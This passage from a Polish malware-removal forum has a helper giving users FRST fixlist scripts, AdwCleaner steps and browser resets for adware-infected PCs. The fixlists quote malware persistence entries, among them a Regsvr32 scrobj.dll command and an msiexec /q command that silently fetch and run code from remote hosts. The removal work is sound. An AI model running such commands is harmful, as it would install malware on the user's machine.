Miszel03

Path na razie zostawiam, jedziemy dalej z problem tytułowym. 1. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\defaults\pref\1304728125.js [2017-05-29] FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\1304728125.cfg [2017-05-29] S1 MpKsl13e6e50c; \??\C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{F2794065-7DA4-43A4-B53C-8BFBC32380E2}\MpKsl13e6e50c.sys [X] Reboot: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Dostarcz plik Fixlog i sam log FRST, już bez pozostałych. Sprawdź również czy problem ustąpił.

Wszystkie informacje dot. podejmowanym działań są ważne. Na temat używania ComboFix poczytaj: KLIK. Raporty nie wykazują oznak infekcji, a skan tyloma rekomendowanymi programami tylko ten wynik potwierdza. Wydaję mi się, że padłeś ofiarą sławnego, klasycznego ataku na użytkowników platformy Steam - KLIK. Żyjemy w takich czasach, że sam login oraz dobre hasło już nie wystarczają. Z danym adresem IP możesz śmiało zgłosić się na Policje, bo doszło do popełnienia przestępstwa (lub wykroczenia, - zależy jakiej wartości było konto). Sugeruję zmianę haseł we wszystkich serwisach logowania powiązanych z platformą Steam oraz uruchomienie weryfikacji dwuetapowej (+ oczywiście jeśli jest to możliwe globalne wylogowanie się ze wszystkich urządzeń, Google np. posiada taką możliwość). W spoilerze zadaję działania poboczne, bez związku z problemem. Zwykła kosmetyka systemowa.

Ten post piszę bym wiedział, że ten temat mam już zakończony.

KOMPUTER 1 Do wdrążenia będą tylko poprawki. Zakładam, ze Browser-Security nie został odinstalowany, bo ten jego wpis jest martwy. 1. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Bagsarah DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Bagsarah "path"="C:\Program Files (x86)\Bagsarah\ DeleteKey: HKEY_USERS\S-1-5-21-2083115291-1334581206-888238541-1001\Software\Bagsarah DeleteKey: HKEY_USERS\S-1-5-21-2083115291-1334581206-888238541-1001\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\ef952496_0 ""="{2}.\\?\hdaudio#func_01&ven_10ec&dev_0270&subsys_1043124d&rev_1001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\espeakertopo/00010001 \Device\HarddiskVolume1\Program Files (x86)\Bagsarah\Application\chrome.exe%b{00000000-0000-0000-0000-000000000000} FF HKLM-x32\...\Firefox\Extensions: [arthurj8283@gmail.com] - C:\Users\Oli\AppData\Roaming\Mozilla\Firefox\Profiles\m03wbirn.default\extensions\arthurj8283@gmail.com => not found EmptyTemp: 2. Zagrożenia wykryte przez AdwCleaner daj do kasacji (za pomocą opcji Oczyść). 3. Potraktuj martwy wpis Browser-Security na liście programów automatem od Microsoft. Kierunek wykonania: Odinstalowywanie > Browser-Security. 4. Podsumuj obecny stan systemu. KOMPUTER 2 Czy Malwarebytes wykrył jakieś zagrożenia? Jak tam wygląda sytuacja aktualnie?

OK, w takim razie kończymy i ewentualnie kiedyś, kiedy problem wróci (ale nawet tego nie próbuj! ) będziemy dalej walczyć. Zastouj DelFix (kasacja używanych narzędzi) oraz zaktualizuj oprogramowanie zewnętrzne oraz Windows.

Przeglądarka Mozilla FireFox w logach nie prezentuje się za ciekawie (modyfikację przypominają mi infekcję, która widziałem podczas szkolenia), dlatego całkowicie ją wyczyścimy podmieniając profil. Oprócz tego widać resztki po programach, które kasuję. To są jednak wszystko problemy poboczne, bo główny problem, który ja widzę to prawdopodobne uszkodzenie zmiennej środowiskowej Path. W wpisach CLSID widoczne są same ścieżki relatywne i najpierw robię pobór danych by wiedzieć na czym stoimy i nie ruszam wpisów Not Found z oznakami uszkodzenia. Na przyszłość, na temat używania ComboFix poczytaj: KLIK. 1. Przez panel sterownia odinstaluj: Zbędniki: Akamai NetSession Interface. Sugeruję pobrać inny klient torrent (np. qBittorent), gdyż w systemie widać reklamotwórczy uTorrent, ten wg mnie nadaje się do deinstalacji. 2. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-3765603254-3117625830-2573589823-1002\...\Policies\Explorer: [] ShellIconOverlayIdentifiers: [sugarSyncBackedUp] -> {0C4A258A-3F3B-4FFF-80A7-9B3BEC139472} => C:\Program Files (x86)\SugarSync\SugarSyncShellExt_x64.dll -> Brak pliku ShellIconOverlayIdentifiers: [sugarSyncPending] -> {62CCD8E3-9C21-41E1-B55E-1E26DFC68511} => C:\Program Files (x86)\SugarSync\SugarSyncShellExt_x64.dll -> Brak pliku ShellIconOverlayIdentifiers: [sugarSyncRoot] -> {A759AFF6-5851-457D-A540-F4ECED148351} => C:\Program Files (x86)\SugarSync\SugarSyncShellExt_x64.dll -> Brak pliku ShellIconOverlayIdentifiers: [sugarSyncShared] -> {1574C9EF-7D58-488F-B358-8B78C1538F51} => C:\Program Files (x86)\SugarSync\SugarSyncShellExt_x64.dll -> Brak pliku HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia HKU\S-1-5-21-3765603254-3117625830-2573589823-1002\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia URLSearchHook: [s-1-5-21-3765603254-3117625830-2573589823-1001] UWAGA => Brak domyślnego URLSearchHook SearchScopes: HKU\S-1-5-21-3765603254-3117625830-2573589823-1002 -> DefaultScope {F4C69FC6-DDCB-4BFD-847E-2C1741B64528} URL = S3 catchme; \??\C:\ComboFix\catchme.sys [X] CMD: set EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. W przeglądarce Google Chrome proponuję zainstalować rozszerzenie uBlock Origin, które uchroni Cię przed natarczywymi reklamami o podłożu nieinfekcyjnym. 4. Nie podoba mi się profil w przeglądarce Mozilla FireFox. Zalecam kompleksową wymianę. Kliknij klawisz z flagą Windows + R > wklej komendę "C:\Program files (x86)\Mozilla Firefox\firefox.exe" -p lub "C:\Program Files\Mozilla Firefox\firefox.exe" -p > załóż nowy profil, wszystkie poprzednie skasuj. Utracisz wszystko z tej przeglądarki, więc ewentualnie możesz wyeksportować zakładki i ważne linki. 5. Pobierz AdwCleaner uruchom go i kliknij Skanuj, kiedy skanowanie zakończy się wydobądź z niego raport, znajduję się on w folderze C:\AdwCleaner. Raport zaprezentuj na forum. 6. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

No trzeba przecież podsumować obecny stan systemu (patrz pkt. 2) Jeśli problem nie ustąpił to będziemy walczyć dalej.

1. Wszystkie zagrożenia wykryte przez AdwCleaner daj do kasacji (za pomocą opcji Oczyść). 2. Podsumuj obecny stan systemu.

W raportach brak oznak infekcji, a drobną kosmetykę pomijam. AdwCleaner wykrył błahe sprawy, a Bitdefender- nie wiem. Dostarcz raport z niego. Temat przenoszę do działu Pozostałe zagadnienie komputerowe.

Brakuje obowiązkowych raportów FRST i GMER - dostarcz je. Te adresy w preferencjach nie wyglądają szkodliwe, aczkolwiek nie powinno ich tam być i zakładam, że nie są celowym ustawieniem. AdwCleaner nie radzi sobie z usunięciem tego ponieważ, prawdopodobnie masz uruchomioną synchronizację przeglądarki i w kółko są ładowane ustawienia z serwera. Wykonaj poniższe punkty, aby pozbyć się modyfikacji preferencji. Odłącz synchronizację przeglądarki: KLIK. Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone, ale używane rozszerzenie będzie trzeba zainstalować o początku. Po tym powtórz skan AdwCleaner i zobacz czy się wszystko powiodło. Po za tym dodam, że nie można grzebać w preferencjach przeglądarki innymi mechanizmami niż one same nam dedykują. W innym wypadku fajerwerki i ogólny nieład w działaniu gwarantowany.

Temat założony w złym dziale i to niezgodnie z regulaminem (brak raportów). Ten dział odpowiedzialny jest za leczenie zarażonych systemów. Adekwatnym działem dla Twojego problemu będzie dział Hardware, więc tam też przenoszę ten temat. Pamiętaj o raportach wymaganych przez dział Hardware.

W systemie widać szczątki oraz aktywne infekcje adware, które tworzą problem opisany przez Ciebie. Szybko się z tym uporamy. Za pomoc oczekuję, że przeczytasz lekturę na temat zabezpieczenia się pod takimi sytuacjami: Portale z oprogramowaniem / Instalatory - na co uważać. 1. Sugeruję pobrać inny klient torrent (np. qBittorent), gdyż w systemie widać reklamotwórczy uTorrent, ten wg mnie nadaje się do deinstalacji. 2. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: Task: {73B02058-2BE7-43F9-9208-DE18984F27A9} - System32\Tasks\{36540287-3F5D-4F9C-AF12-525B7907E0AE} => pcalua.exe -a C:\Users\KRZYSZ~1\AppData\Local\Temp\VSD31D9.tmp\vcredist_x86\vcredist_x86.exe -d C:\Users\Krzysztof\Downloads -c /q:a Task: {799B6859-03C5-4408-BAEE-BFC1A768AF4A} - System32\Tasks\fornews2017orgqaqsm => Firefox.exe fornews2017.org/qaqsm HKU\S-1-5-21-1886510041-2021175145-3369468900-1000\...\Policies\Explorer: [NoSaveSettings] 0 AppInit_DLLs: C:\ProgramData\Quotenamron\U-tax.dll => Brak pliku AppInit_DLLs-x32: C:\ProgramData\Quotenamron\Stanbam.dll => Brak pliku RemoveDirectory: C:\ProgramData\Quotenamron SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL = S2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [X] S2 backlh; C:\ProgramData\Logic Handler\set.exe [X] S3 dbx; system32\DRIVERS\dbx.sys [X] U3 pwddqpow; \??\C:\Users\KRZYSZ~1\AppData\Local\Temp\pwddqpow.sys [X] 2016-07-10 21:12 - 2016-07-10 21:12 - 6870016 _____ () C:\Users\Krzysztof\AppData\Roaming\agent.dat 2016-07-10 21:12 - 2016-07-10 21:12 - 0067968 _____ () C:\Users\Krzysztof\AppData\Roaming\Config.xml 2016-07-10 21:11 - 2016-07-10 21:12 - 0014448 _____ () C:\Users\Krzysztof\AppData\Roaming\InstallationConfiguration.xml 2016-07-10 21:11 - 2016-07-10 21:11 - 0128512 _____ () C:\Users\Krzysztof\AppData\Roaming\Installer.dat 2016-07-10 21:12 - 2016-07-10 21:12 - 1760781 _____ () C:\Users\Krzysztof\AppData\Roaming\Lot-Sing.tst 2016-07-10 21:12 - 2016-07-10 21:12 - 0018432 _____ () C:\Users\Krzysztof\AppData\Roaming\Main.dat 2016-07-10 21:12 - 2016-07-10 21:12 - 0005568 _____ () C:\Users\Krzysztof\AppData\Roaming\md.xml 2016-07-10 21:12 - 2016-07-10 21:12 - 0126464 _____ () C:\Users\Krzysztof\AppData\Roaming\noah.dat EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść i zabezpiecz przeglądarkę Mozilla FireFox: Odłącz synchronizację (o ile włączona): KLIK. Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. Menu Historia > Wyczyść historię przeglądania. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin. 4. Pobierz AdwCleaner uruchom go i kliknij Skanuj, kiedy skanowanie zakończy się wydobądź z niego raport, znajduję się on w folderze C:\AdwCleaner. Raport zaprezentuj na forum. 6. Zrób nowy log FRST z opcji Skanuj (Scan), wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

OK. Zamykam.

Skrypt (pkt. 1) nie wykonał się, wykonaj go jeszcze raz, ale czekaj cierpliwie i nie przerywaj tego procesu. Jeśli nadal się nie wykona (= będą skróty) to zrobisz to z poziomu Trybu awaryjnego (klik w F8 przed startem systemu).

OK, w takim temat uznaję za rozwiązany.

Gdzie plik SearchReg? Czy AdwCleaner coś wykrył? Rób moje zlecenia wolniej, ale dokładniej, bo tylko marnujesz mój czas.

Teraz raporty są w porządku. Widać rozmaite infekcje adware oraz fałszywe przeglądarki, które podszywają się pod oryginalne, zainstalowane (oprócz FireFox'a, którego nie ma zainstalowanego w oryginalnej wersji). Portale z oprogramowaniem / Instalatory - na co uważać 1. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: Task: {59BEB99E-C271-4376-BDB0-276EA360A713} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkMj83FURWRjqcMUEcRYI1NYM3FjzLMjH2FdZYRYIxRWqdRH== scrobj.dll C:\Users\Lareco\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Users\Lareco\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk C:\Users\Public\Desktop\Google Chrome.lnk RemoveDirectory: C:\Program Files (x86)\Setleaf RemoveDirectory: C:\Users\Lareco\AppData\Local\Setleaf RemoveDirectory: C:\Users\Lareco\AppData\Roaming\Setleaf FirewallRules: [{E75FFA4B-FC78-4CA5-BE2B-43940E08283B}] => (Allow) C:\Program Files (x86)\Setleaf\Application\chrome.exe FirewallRules: [{AE24E800-7B9F-4513-868E-B8212938ABEB}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe FirewallRules: [{563DD3A2-248E-4668-9278-5F1B363839D7}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe RemoveDirectory: C:\Program Files (x86)\Firefox RemoveDirectory: C:\Users\Lareco\AppData\Local\Firefox RemoveDirectory: C:\Users\Lareco\AppData\Roaming\Firefox Winlogon\Notify\ScCertProp: wlnotify.dll [X] IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia HKU\S-1-5-21-3868839101-544848183-1789199905-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM-x32 -> DefaultScope - brak wartości SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = R2 WinCacheSrv; C:\ProgramData\Package Cache\{E01CB7F1-3E88-4450-1764-B3CC1E205C4A}v10.1.14393.795\Installers\30daf459e79c5d26366654b1b482e87.cab:dp [205826 ] () [brak podpisu cyfrowego] S2 InstallerService; "C:\Program Files\TrueKey\Mcafee.TrueKey.InstallerService.exe" [X] S3 catchme; \??\C:\ComboFix\catchme.sys [X] U3 pxldqpow; \??\C:\Users\Lareco\AppData\Local\Temp\pxldqpow.sys [X] 2017-05-24 12:10 - 2017-05-24 12:10 - 00000000 _____ C:\Windows\SysWOW64\55 2017-05-24 12:09 - 2017-05-24 12:09 - 00000042 _____ C:\Windows\SysWOW64\GZ 2017-05-11 15:10 - 2017-05-18 09:09 - 00000000 _____ C:\Windows\SysWOW64\3333333 2017-05-11 15:09 - 2017-05-24 12:10 - 00000000 _____ C:\Windows\SysWOW64\33 2017-05-11 15:09 - 2017-05-24 12:09 - 00000000 _____ C:\Windows\SysWOW64\1111 2017-05-11 15:09 - 2017-05-24 12:09 - 00000000 _____ C:\Windows\SysWOW64\11 2017-05-11 15:09 - 2017-05-24 12:09 - 00000000 _____ C:\Windows\SysWOW64\00 2017-05-11 15:09 - 2017-05-18 09:09 - 00000000 _____ C:\Windows\SysWOW64\1111111 C:\Program Files (x86)\BiaoJi C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk C:\Users\Public\Desktop\Mozilla Firefox.lnk DeleteKey: HKCU\Software\Mozilla\Firefox DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla\Firefox DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla\Firefox DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\Lareco\AppData\Local\Mozilla\Firefox C:\Users\Lareco\AppData\Roaming\Mozilla\Firefox C:\Users\Lareco\AppData\Roaming\Profiles EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Wyczyść i zabezpiecz przeglądarki. Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin Ustaw jakąkolwiek zaufaną przeglądarkę jako domyślną, najlepiej Google Chrome. To wymagany krok to kasacji modyfikacji infekcji. 3. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry). betleaf;firefox;biaoJi Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 4. Upewnij się, że AdwCleaner już niczego nie wykrywa. Ewentualne detekcję daj do kasacji. 5. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

Wygląda to już w porządku. Poprawki: 1. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Everness DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Everness] "path"="C:\Program Files (x86)\Everness\ DeleteKey: HKEY_USERS\S-1-5-21-2511481870-1426507333-4213709584-1000\Software\Everness DeleteKey: HKEY_USERS\S-1-5-21-2511481870-1426507333-4213709584-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\39973f75_0 ""="{0.0.0.00000000}.{ad291970-153d-483e-873e-ccbe8bb3130f} \Device\HarddiskVolume2\Program Files (x86)\Everness\Application\chrome.exe%b{00000000-0000-0000-0000-000000000000} DeleteKey: HKEY_USERS\S-1-5-21-2511481870-1426507333-4213709584-1000\Software\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe ""="C:\Program Files (x86)\Everness\Application\chrome.exe DeleteKey: HKEY_USERS\S-1-5-21-2511481870-1426507333-4213709584-1000\Software\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe "Path"="C:\Program Files (x86)\Everness\Application HKEY_USERS\S-1-5-21-2511481870-1426507333-4213709584-1000\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache "C:\Program Files (x86)\Everness\Application\chrome.exe"="Google Chrome Reboot: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Dostarcz plik Fixlog i podsumuj obecny stan systemu.

Dwie fałszywki: pod Google Chrome (lecz tutaj brak zainstalowanego oryginału przeglądarki) i pod Mozilla FireFox. Po za tym widać również wpisy startowe na powłoce i w Harmonogramie zadań uruchamiające różne strony, a plik Hosts został szkodliwe zmodyfikowany. Za pomoc oczekuję, że przeczytasz lekturę na temat zabezpieczenia się pod takimi sytuacjami: Portale z oprogramowaniem / Instalatory - na co uważać. 1. Przez panel sterowania odinstaluj: Adware / PUP: AlphaGo. Fałszywe oprogramowanie zabezpieczające: YAC(Yet Another Cleaner!). 2. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: Task: {0BBC3407-63A7-4024-8D87-2C8F66C78D92} - \PowerWord-SCT-JT -> Brak pliku Task: {CDFEB964-06FE-47B9-A5BE-A0CC5F3B3636} - \Windows-WoShiBeiYongDe -> Brak pliku C:\Users\BD\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk RemoveDirectory: C:\Program Files (x86)\Hotleaf RemoveDirectory: C:\Users\BD\AppData\Local\Hotleaf RemoveDirectory: C:\Users\BD\AppData\Roaming\Hotleaf FirewallRules: [{153D5063-7879-460C-A56D-AB1A5629D961}] => (Allow) C:\Program Files (x86)\Hotleaf\Application\chrome.exe FirewallRules: [{1CCACA35-7A3C-4772-84A9-638AB306BF36}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe FirewallRules: [{9D45CE1D-2C50-41A7-915F-78DD6CF0ACC3}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe RemoveDirectory: C:\Program Files (x86)\Firefox RemoveDirectory: C:\Users\BD\AppData\Local\Firefox RemoveDirectory: C:\Users\BD\AppData\Roaming\Firefox HKU\S-1-5-21-247650637-2128827155-1350483122-1001\...\Policies\system: [shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj82RYZLNjzQOWIcNWqdRTVSF8VSFkM5FkIcMWk5FdI3MF== /q IFEO\DisplaySwitch.exe: [Debugger] IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe IFEO\taskmgr.exe: [Debugger] ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = Edge HomeButtonPage: HKU\S-1-5-21-247650637-2128827155-1350483122-1001 -> hxxp://www.ourluckysites.com/?type=hp&ts=1493719012&z=cb9aa0b8f138258742938bdg4zftfcdmdg6t9eageg&from=ypid&uid=ST1000LM014-SSHD-8GB_W772XDYDXXXXW772XDYD R2 ibtsiva; %SystemRoot%\system32\ibtsiva [X] S3 dbx; system32\DRIVERS\dbx.sys [X] 2017-05-24 14:29 - 2017-05-24 14:29 - 00000042 _____ C:\WINDOWS\SysWOW64\GZ 2017-05-24 14:29 - 2017-05-24 14:29 - 00000000 _____ C:\WINDOWS\SysWOW64\3333333 2017-05-24 14:29 - 2017-05-24 14:29 - 00000000 _____ C:\WINDOWS\SysWOW64\1111111 2017-05-18 14:38 - 2017-05-24 14:29 - 00000000 _____ C:\WINDOWS\SysWOW64\00 2017-05-10 12:25 - 2017-05-10 12:25 - 00000000 _____ C:\WINDOWS\SysWOW64\1 2017-05-09 13:54 - 2017-05-24 14:29 - 00000000 _____ C:\WINDOWS\SysWOW64\1111 2017-05-25 09:25 - 2017-04-25 22:05 - 00000000 ____D C:\Program Files (x86)\BiaoJi 2017-05-05 14:59 - 2017-05-05 14:59 - 00000000 ____D C:\WINDOWS\psgo RemoveDirectory: C:\Program Files (x86)\MIO C:\Users\BD\Desktop\Outlook 2016.lnk C:\Users\BD\AppData\Roaming\Microsoft\Word\Nowy%20Dokument%20programu%20Microsoft%20Word305945570761120801\Nowy%20Dokument%20programu%20Microsoft%20Word.docx.lnk C:\Users\BD\AppData\Roaming\Microsoft\Windows\SendTo\Android (ALLPlayer Pilot).lnk C:\Users\BD\AppData\Roaming\Microsoft\Excel\TB-07_401A-412A305951521776555499\TB-07_401A-412A.DBF.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk C:\Users\BD\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk C:\Users\Public\Desktop\Mozilla Firefox.lnk C:\Program Files (x86)\Google C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome C:\Users\BD\AppData\Local\Google DeleteKey: HKCU\Software\Google DeleteKey: HKLM\SOFTWARE\Google DeleteKey: HKLM\SOFTWARE\Wow6432Node\Google Hosts: EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść i zabezpiecz przeglądarkę Mozilla FireFox: Odłącz synchronizację (o ile włączona): KLIK. Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. Menu Historia > Wyczyść historię przeglądania. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin. Ustaw tą przeglądarkę jako domyślną, aby cofnąć modyfikację infekcji. 4. Pobierz AdwCleaner uruchom go i kliknij Skanuj, kiedy skanowanie zakończy się wydobądź z niego raport, znajduję się on w folderze C:\AdwCleaner. Raport zaprezentuj na forum. 5. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry). hotleaf;firefox;biaoJi Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 6. Zrób nowy log FRST z opcji Skanuj (Scan), wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

Dodaj również raport z AdwCleaner i raporty z tego drugiego komputera.

Raporty nie wykazują oznak infekcji, więc takową wykluczam. Zostają dedykowane programy szpiegowskie takie jak m.in SpyLogger, ale je wyjątkowo trudno wykryć. Dlaczego podejrzewasz kradzież danych osobistych? Zapytaj znajomego wprost, - jeśli będziesz miał jakiekolwiek podejrzenia i poparcia na to to śmiało zgłoś sprawę na Policję. Tymczasem wykonaj poniższe kroki zabezpieczające. 1. Zaktualizuj oprogramowanie routera. 2. Zmień ponownie hasło do routera, ustaw je trudne, ale łatwe do zapamiętanie. Duże, małe litery, znaki specjalne. 3. Zamknij dostęp do panelu zarządzania od strony Internetu z poziomu routera. Po konfiguracji uruchom ten test mający potwierdzić zabezpieczenie: KLIK. Jeśli wszystko wypadnie pozytywnie to przejedź dalej. 4. Zaktualizuj system Windows (wszystkie dostępne aktualizacje mają zostać wdrążone (pomijasz tylko pakiety językowe) - KLIK. 5. Zaktualizuj wszystkie dostępne programy na Twoim komputerze - KLIK. 6. Zmień hasła do wszystkich serwisów logowania, banki, poczty elektroniczne, portale społecznościowe. Tam gdzie możesz uruchom proces weryfikacji dwuetapowej. 7. Wymuszaj połączenia szyfrowane poprzez HTTPS na wszystkich ewentualnych stronach logowania, sprawdzaj certyfikaty autentyczności. Jeśli dalej będzie obawa o szpiegowanie to moja rada, opierająca się o kilkuletnie doświadczenie radzi wykonać kompleksową reinstalację systemu.

Pomieszałeś raporty (FRST jest taki sam jak Addition). Wygeneruj nowe i załącz je dokładnie, nie zmieniając ich zawartości.

Zastouj DelFix (kasacja używanych narzędzi) oraz zaktualizuj oprogramowanie zewnętrzne oraz Windows.

Wejdź w C:\AdwCleaner i dostarcz mi z tego raport. Po za tym proszę o raport GMER, który jest raportem obowiązkowym na tym forum.

Zamykam.